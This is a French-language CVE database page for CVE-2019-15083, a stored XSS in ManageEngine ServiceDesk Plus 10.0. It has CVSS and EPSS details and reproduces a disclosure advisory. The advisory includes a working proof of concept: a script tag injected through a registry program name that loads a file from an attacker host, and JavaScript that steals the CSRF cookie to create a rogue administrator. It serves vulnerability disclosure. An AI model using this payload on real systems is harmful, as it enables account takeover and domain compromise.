CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Default installations of Zoho ManageEngine ServiceDesk Plus 10.0 before 10500 are vulnerable to XSS injected by a workstation local administrator. Using the installed program names of the computer as a vector, the local administrator can execute code on the Manage Engine ServiceDesk administrator side. At "Asset Home > Server > > software" the administrator of ManageEngine can control what software is installed on the workstation. This table shows all the installed program names in the Software column. In this field, a remote attacker can inject malicious code in order to execute it when the ManageEngine administrator visualizes this page.
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V3.1
6.1
MEDIUM
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
More informations
Base: Exploitabilty Metrics
The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.
Attack Vector
This metric reflects the context by which vulnerability exploitation is possible.
Network
The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).
Attack Complexity
This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.
Low
Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.
Privileges Required
This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.
None
The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.
Required
Successful exploitation of this vulnerability requires a user to take some action before the vulnerability can be exploited. For example, a successful exploit may only be possible during the installation of an application by a system administrator.
Base: Scope Metrics
The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.
Scope
Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.
Changed
An exploited vulnerability can affect resources beyond the security scope managed by the security authority of the vulnerable component. In this case, the vulnerable component and the impacted component are different and managed by different security authorities.
Base: Impact Metrics
The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.
Confidentiality Impact
This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.
Low
There is some loss of confidentiality. Access to some restricted information is obtained, but the attacker does not have control over what information is obtained, or the amount or kind of loss is limited. The information disclosure does not cause a direct, serious loss to the impacted component.
Integrity Impact
This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.
Low
Modification of data is possible, but the attacker does not have control over the consequence of a modification, or the amount of modification is limited. The data modification does not have a direct, serious impact on the impacted component.
Availability Impact
This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.
None
There is no impact to availability within the impacted component.
Temporal Metrics
The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.
Environmental Metrics
These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.
nvd@nist.gov
V2
4.3
AV:N/AC:M/Au:N/C:N/I:P/A:N
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2021-04-18
9.47%
–
–
–
–
2021-09-05
–
9.47%
–
–
–
2022-01-09
–
9.47%
–
–
–
2022-02-06
–
–
32.33%
–
–
2022-04-03
–
–
7.95%
–
–
2023-03-12
–
–
–
1.59%
–
2023-04-23
–
–
–
1.68%
–
2023-10-22
–
–
–
2.36%
–
2024-03-03
–
–
–
2.36%
–
2024-06-02
–
–
–
2.36%
–
2024-06-02
–
–
–
2.36%
–
2024-12-22
–
–
–
0.52%
–
2025-01-19
–
–
–
0.52%
–
2025-03-18
–
–
–
–
1.09%
2025-03-30
–
–
–
–
1.23%
2025-04-15
–
–
–
–
1.23%
2025-04-15
–
–
–
–
1.23,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2020-05-14 22h00 +00:00 Auteur : Felipe Molina EDB Vérifié : No
# Exploit Title: ManageEngine Service Desk 10.0 - Cross-Site Scripting
# Date: 2020-05-14
# Exploit Author: Felipe Molina (@felmoltor)
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/service-desk/download.html
# Version: 10.0 (10000.0.0.0)
# Tested on: Windows 10
# CVE : CVE-2019-15083
[SPUK-2020-05/ManageEngine Service Desk XSS in remote IT Assets Management ]------------------------------
SECURITY ADVISORY: SPUK-2019-04/ManageEngine Service Desk XSS in remote IT Assets Management
Affected Software: ManageEngine Service Desk Plus (version 10.0, installer version 10000.0.0.0, SHA1: 86EA684666CE85AF710CA9805B7FF37E3D4FD65D)
Vulnerability: Cross-Site Scripting
CVE: CVE-2019-15083
CVSSv3: 5.9 (CVSS:3.0/AV:A/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N)
Severity: Medium
Release Date: 2020-05-14
I. Background
~~~~~~~~~~~~~
From ManageEngine's website:
"ServiceDesk Plus is a game changer in turning IT teams from daily fire-fighting to delivering awesome customer service. It provides great visibility and central control in dealing with IT issues to ensure that businesses suffer no downtime. For 10 years and running, it has been delivering smiles to millions of IT folks, end users, and stakeholders alike.
Version Enterprise: help desk + ITIL + asset + project
The complete ITIL ready ITSM suite with all features that an IT service desk needs.
* Incident management
* Problem management
* Change management
* IT project management
* Service catalog
* Asset management
* CMDB"
II. Description
~~~~~~~~~~~~~~~
From wks administrator to Manage Engine Administrator:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Default installations of "ManageEngine ServiceDesk Plus 10.0" were found to be vulnerable to a XSS injected by a workstation local administrator. Using the installed program names of the computer as a vector, the local administrator can execute JavaScript code on the Manage Engine ServiceDesk administrator side.
On "Asset Home > Server > <workstation> > software" the administrator of ManageEngine can control what software is installed on the workstation. This table shows all the installed program names on the column "Software". In this field and probably in others, a remote attacker can inject malicious code in order to execute it when the ManageEngine admnistrator visualizes this page.
In this case, the provided proof of concept creates a administrator user on ManageEngine Service Desk.
PoC:
~~~~
1. Access to the workstation managed by ManageEngine with a local administrator account.
2. Open regedit.exe as administrator
3. Navigate to "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\<program>"
4. Change the current "DisplayName" to this value:
test</a><script src=http://<attacker_ip>/addadmin.js type="text/javascript"/><a>bla
5. On the root of <attacker_ip> web server, deploy the file "addadmin.js" with this content:
var createAdminParams= "sdpcsrfparam=<TOKEN>&mode=new&loginPermitted=null&loggedUserId=4&userID=-1&divToShow=listView&firstName=Legituser+4&middleName=L&lastName=Inocent+4&fullName=Legituser+4+L+Inocent+4&ciTypeId=6&ciId=null&employeeID=666&CI_BaseElement_IMPACTID=null&ciDescription=&ciName=Legituser+4+L+Inocent+4&email=&phone=&mobile=&smsID=&cost=0.00&deptName=None&reportingToid=&reportingTo=&jobTitle=&isSDSiteAdmin=false&associatedSites=null&projectrole=null&canApproveSR=false&approveLimitValue=&provideLogin=on&sdpAPIKey=&apiKeyExpiry=&userName=legituser4&addNewLogin=true&userPwd=legituser&confirmUserPwd=legituser&userDomain=None&isAdmin=SDAdmin&assignedRoles=2&dcRole=DCAdmin&froModuleForUDF=TECH&addButton=Save";
// Save the CSRF cookie into a variable
var sdpcsrfcookie;
carr = document.cookie.split(";");
for (i=0;i<carr.length;i++){
if (carr[i].split("=")[0].trim() == "sdpcsrfcookie"){
sdpcsrfcookie=carr[i].split("=")[1].trim();
}
}
if (sdpcsrfcookie === undefined){
console.log("No CSRF cookie was found. Aborting the PoC :-(")
}
else {
var ajaxreq = new XMLHttpRequest();
ajaxreq.open('POST', '/TechnicianDef.do');
ajaxreq.withCredentials = true;
ajaxreq.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml");
ajaxreq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
console.log("Creating a new user on Manage Engine with CSRF token: "+sdpcsrfcookie);
// Update the CSRF token parameter with the token present in the user cookie
params = createAdminParams.replace("<TOKEN>",sdpcsrfcookie);
console.log("posting to create a new admin user: "+params);
ajaxreq.send(params);
}
6. Reboot the workstation to forthe the agent to update the program list.
7. Now, login as the administrator of ManageEngine SelfService.
8. Navigate to "Asset Home > Server > <workstation> > software"
9. Click on "Next" button until the software name is visualized on the table.
10. Now, go to "Admin > Users > Technicians" and verify that the administrator user "legituser4 " has been created.
III. Impact
~~~~~~~~~~~
The XSS can be injected remotely from any workstation that is being managed by ManageEngine ServiceDesk with no need for the attacker to access the web application. This PoC shows the creation of an administrator of ManageEngine, but it can be potentially used to create Domain Admin users if the service is configured properly, therefore, compromising the whole domain where the workstation is in.
CVSS 3.0 Score:
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N
IV. Remediation
~~~~~~~~~~~~~~~
Sanitize all the input from the remote agents before showing the values in the web page. Use typical XSS protection also for values that are not directly input on web formularies of the application.
V. Disclosure
~~~~~~~~~~~~~
Reported By: Felipe Molina de la Torre (Felipe (at) SensePost.com)
Vendor Informed: 2019-04-30
Patch Release Date: 2019-04-16
Publick Ack. of the vuln: 2020-05-13
Advisory Release Date: 2020-05-14
---------------------------------[SPUK-2020-05/ManageEngine Service Desk XSS in remote IT Assets Management ]---
Products Mentioned
Configuraton 0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0
Zohocorp>>Manageengine_servicedesk_plus >> Version 10.0.0 (Open CPE detail)